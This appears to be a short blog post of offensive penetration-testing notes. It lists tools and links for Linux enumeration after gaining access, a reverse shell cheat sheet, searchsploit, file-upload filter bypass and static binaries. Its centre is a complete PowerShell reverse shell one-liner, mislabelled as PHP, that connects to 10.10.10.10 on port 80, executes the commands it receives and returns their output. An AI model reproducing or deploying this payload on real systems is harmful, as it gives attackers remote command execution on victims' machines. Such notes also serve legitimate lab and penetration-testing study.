Little tools, Big help

If you can get access to the machine and it is Linux, get this shell script into the /tmp directory.  Change it’s mod (chmod +777) then execute it.  It will give all kinds of useful information about the Linux OS.

https://github.com/rebootuser/LinEnum

Pentestmonkey.com reverse shell cheatsheet.  This link is worth pure gold.

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

Configuring and using searchsploit on your attack box.  This will really speed up looking for vulnerabilities and exploits.

php reverse shell$client = New-Object System.Net.Sockets.TCPClient(“10.10.10.10”,80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + “PS ” + (pwd).Path + “> “;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

File upload bypass, this is a great article on the subject

https://thehackersplanet.com/upload-web-shell-filter-bypass-file-extension/

https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/

clone the following github for needed tools

https://github.com/andrew-d/static-binaries

more will be added….

 

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s